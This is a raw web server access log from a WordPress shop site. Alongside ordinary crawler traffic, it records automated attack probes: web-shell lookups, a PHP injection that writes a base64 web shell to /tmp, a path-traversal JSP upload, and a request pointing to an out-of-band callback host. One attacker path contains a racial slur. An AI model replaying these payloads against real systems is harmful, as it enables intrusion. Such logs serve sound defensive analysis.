157.20.32.210 - - [18/Oct/2025:16:07:27 -0400] "GET /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file=q26Mgv3ZKP9ipXVY&ticket=HIkN1Xxqyx6xtAFZ&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_odB6XSJVJT42FCibpJayntYv0nt7S5wV HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
202.56.2.88 - - [18/Oct/2025:16:07:44 -0400] "GET /wp-content/upgrade/about.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:06:04 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fsalhab360photos.com%2Fwp-admin%2Fcss%2Fcolors%2FsHQwacY.php&reauth=1 HTTP/1.1" 200 2375 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:06:18 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
98.70.29.56 - - [18/Oct/2025:16:06:28 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
216.73.216.159 - - [18/Oct/2025:16:06:29 -0400] "GET /products186501816?kg=0184227485 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:16:06:47 -0400] "POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:07:01 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fsalhab360photos.com%2Fwp-admin%2Fcss%2FdnIzIDf.php&reauth=1 HTTP/1.1" 200 2371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:16:07:21 -0400] "POST /wp-cron.php?doing_wp_cron=1760818041.2714910507202148437500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:16:07:21 -0400] "GET /login?next=/ HTTP/1.1" 404 10902 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:78.0) Gecko/20100101 Firefox/78.0"
200.115.96.180 - - [18/Oct/2025:16:07:40 -0400] "GET /ultimate-video-player/embed/ HTTP/1.1" 200 6390 "-" "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/534.45.1 (KHTML, like Gecko) Version/4.1 Safari/534.45.1"
216.73.216.159 - - [18/Oct/2025:16:08:05 -0400] "GET /products133314702?kg=0131688994 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:16:08:23 -0400] "POST /wp-cron.php?doing_wp_cron=1760818103.3035740852355957031250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
202.56.2.88 - - [18/Oct/2025:16:08:20 -0400] "GET /wp-includes/sitemaps/about.php HTTP/1.1" 404 12355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
66.249.64.107 - - [18/Oct/2025:16:08:27 -0400] "GET /products121513336?kg=0120031549 HTTP/1.1" 200 29234 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:16:08:27 -0400] "POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:08:34 -0400] "GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1" 404 12355 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/59.0"
20.171.207.254 - - [18/Oct/2025:16:08:42 -0400] "GET /products60889806?kg=0060147330 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:16:09:04 -0400] "POST /wp-admin/admin-ajax.php?0=MzRFWWJVWTMzMWlOd3Q5eTcyUzQ2UDF3bk5J HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15"
185.61.153.107 - - [18/Oct/2025:16:09:23 -0400] "POST /wp-cron.php?doing_wp_cron=1760818163.4723389148712158203125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:16:07:41 -0400] "GET /products60909158?kg=0060166446 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
202.56.2.88 - - [18/Oct/2025:16:08:01 -0400] "GET /wp-includes/room.php HTTP/1.1" 404 10899 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:08:31 -0400] "POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:08:40 -0400] "GET /wp-admin/css/colors/HsFPDcD.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:08:42 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fsalhab360photos.com%2Fwp-admin%2Fcss%2Fcolors%2FHsFPDcD.php&reauth=1 HTTP/1.1" 200 2375 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:08:47 -0400] "GET /products34955156?kg=0034528955 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:16:08:59 -0400] "GET /wp-admin/js/QXUho.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:09:00 -0400] "POST /wp-admin/admin-ajax.php?+config-create+/&/<\?=base64_decode($_GET[0])?>+/tmp/34EYbRzLpv3qaBRwwAxbQTZA5yB.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:09:01 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fsalhab360photos.com%2Fwp-admin%2Fjs%2FQXUho.php&reauth=1 HTTP/1.1" 200 2369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:09:26 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fsalhab360photos.com%2Fwp-admin%2Fcss%2Fcolors%2Fblue%2FWSidp.php&reauth=1 HTTP/1.1" 200 2376 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:09:34 -0400] "POST /MagicInfo/servlet/SWUpdateFileUploader?fileName=./../../../../../../server/mTpWCf.jsp&deviceType=abc&deviceModelName=test&swVer=123 HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:09:43 -0400] "GET /wp-includes/class-wp-simple-js.php HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:10:16 -0400] "POST /apps/zxtm/wizard.fcgi?error=1§ion=Access+Management%3ALocalUsers HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0"
20.171.207.254 - - [18/Oct/2025:16:10:48 -0400] "GET /products60925800?kg=0060182885 HTTP/1.1" 404 9731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
202.56.2.88 - - [18/Oct/2025:16:11:11 -0400] "GET /wp-content/plugins/phpad/as.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:11:20 -0400] "POST /wp-json/hc/v1/themehunk-import HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
202.56.2.88 - - [18/Oct/2025:16:09:21 -0400] "GET /wp-admin/css/colors/blue/WSidp.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:09:41 -0400] "GET /products167573154?kg=0165529660 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:16:09:44 -0400] "GET /products60913700?kg=0060170931 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.68.247.203 - - [18/Oct/2025:16:09:49 -0400] "GET /products146524848?kg=0144738041 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
202.56.2.88 - - [18/Oct/2025:16:10:02 -0400] "GET /wp-admin/css/colors/midnight/UwnDYGke.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:10:07 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fsalhab360photos.com%2Fwp-admin%2Fcss%2Fcolors%2Fmidnight%2FUwnDYGke.php&reauth=1 HTTP/1.1" 200 2381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:16:10:19 -0400] "POST /wp-cron.php?doing_wp_cron=1760818218.9665400981903076171875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:16:10:28 -0400] "GET /products48489306?kg=0047898056 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:16:10:31 -0400] "GET /wp-includes/wp-includes_function.php HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:10:47 -0400] "POST /API/convertCSVtoParquet.php HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15"
202.56.2.88 - - [18/Oct/2025:16:10:48 -0400] "GET /wp-includes/ID3/about.php HTTP/1.1" 404 12361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:16:11:22 -0400] "POST /wp-cron.php?doing_wp_cron=1760818282.3807709217071533203125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:16:11:24 -0400] "GET /products148454276?kg=0146643939 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:16:11:28 -0400] "GET /bitrix/admin/htmleditor2/simple.php HTTP/1.1" 404 12366 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:11:47 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:11:48 -0400] "GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1"
202.56.2.88 - - [18/Oct/2025:16:12:19 -0400] "GET /wp-content/themes/digital-download/new.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
206.189.247.132 - - [18/Oct/2025:16:12:19 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
202.56.2.88 - - [18/Oct/2025:16:11:50 -0400] "GET /wp-content/plugins/anttt/simple.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:16:11:50 -0400] "GET /products60876964?kg=0060134643 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:16:11:55 -0400] "POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0"
157.20.32.210 - - [18/Oct/2025:16:11:59 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/534.16+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
202.56.2.88 - - [18/Oct/2025:16:12:05 -0400] "GET /wp-content/plugins/TOPXOH/wDR.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
3.8.127.128 - - [18/Oct/2025:16:12:19 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
138.68.166.157 - - [18/Oct/2025:16:12:26 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
185.61.153.107 - - [18/Oct/2025:16:12:32 -0400] "POST /wp-cron.php?doing_wp_cron=1760818352.1684648990631103515625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
202.56.2.88 - - [18/Oct/2025:16:12:32 -0400] "GET /epinyins.php HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:12:36 -0400] "POST /app/modules/ut-cac/admin/cli.php HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/129.0"
157.20.32.210 - - [18/Oct/2025:16:12:55 -0400] "GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
193.239.84.73 - - [18/Oct/2025:16:13:00 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
202.56.2.88 - - [18/Oct/2025:16:13:08 -0400] "GET /.well-known/ HTTP/1.1" 200 761 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:16:13:17 -0400] "GET /products13150130?kg=0012989844 HTTP/1.1" 200 29074 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:16:13:23 -0400] "POST /wp-cron.php?doing_wp_cron=1760818403.4673969745635986328125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
94.23.188.223 - - [18/Oct/2025:16:13:20 -0400] "GET /products146504562?kg=0144718004 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.159 - - [18/Oct/2025:16:13:43 -0400] "GET /products156944018?kg=0155030148 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:16:14:04 -0400] "GET /wp-includes/images/include.php HTTP/1.1" 404 12365 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:16:14:19 -0400] "POST /wp-cron.php?doing_wp_cron=1760818459.1729300022125244140625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:16:14:15 -0400] "GET /products111883506?kg=0110519156 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:16:14:56 -0400] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=218089 HTTP/1.1" 200 29260 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:16:14:56 -0400] "GET /products88027902?kg=0086954474 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:16:14:59 -0400] "GET /API/regionsDiscovery.php?master=spark%3A%2F%2Fd3pm34ikdbcl3g7iqchgxcryxn18tepxm.oast.pro:443&mask=26&project=your_project&devices=device1%2Cdevice2&mtserver=127.0.0.1%3A3306&mtuser=root&mtpassword=paloalto&task-id=1193&mode=pre-analysis®ions&parquetPath=%2Ftmp&timezone=Europe%2FHelsinki&mlserver=127.0.0.1&debug=false&initDate=2023-01-01&endDate=2023-01-31 HTTP/1.1" 404 10896 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:16:15:02 -0400] "GET /products206188504?kg=0203674093 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:16:15:01 -0400] "GET /products60906516?kg=0060163835 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
202.56.2.88 - - [18/Oct/2025:16:15:12 -0400] "GET /fekfek.php HTTP/1.1" 404 10904 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
98.70.29.56 - - [18/Oct/2025:16:15:27 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
66.249.64.105 - - [18/Oct/2025:16:15:31 -0400] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=1480118 HTTP/1.1" 200 28867 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.56.2.88 - - [18/Oct/2025:16:15:44 -0400] "GET /wp-content/themes/niggatheme/bbh.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:16:00 -0400] "GET /wp-content/themes/niggatheme/newsfeed.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:16:16:02 -0400] "GET /products60904808?kg=0060162149 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.105 - - [18/Oct/2025:16:16:20 -0400] "GET /categories/11452034 HTTP/1.1" 200 29272 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:16:16:20 -0400] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=103519 HTTP/1.1" 200 30034 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:16:16:35 -0400] "GET /?products122705998?kg=0121209666 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:16:12:31 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:12:29 -0400] "GET /vicidial/welcome.php HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
20.171.207.254 - - [18/Oct/2025:16:12:53 -0400] "GET /products60924902?kg=0060181998 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
202.56.2.88 - - [18/Oct/2025:16:13:01 -0400] "GET /.well-known/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:13:29 -0400] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:13:49 -0400] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:16:13:56 -0400] "GET /products60936546?kg=0060193500 HTTP/1.1" 404 9796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
202.56.2.88 - - [18/Oct/2025:16:14:28 -0400] "GET /wp-includes/widgets/include.php HTTP/1.1" 404 12360 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:14:53 -0400] "GET /wp-content/ThreeFox_Exploit/threefox.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:14:51 -0400] "GET /products6808874?kg=0006725920 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:16:15:20 -0400] "POST /wp-cron.php?doing_wp_cron=1760818520.6708281040191650390625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:16:15:15 -0400] "GET /products6789322?kg=0006706608 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:16:15:30 -0400] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=107328 HTTP/1.1" 200 29022 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:16:15:25 -0400] "POST /api/remote HTTP/1.1" 404 10851 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
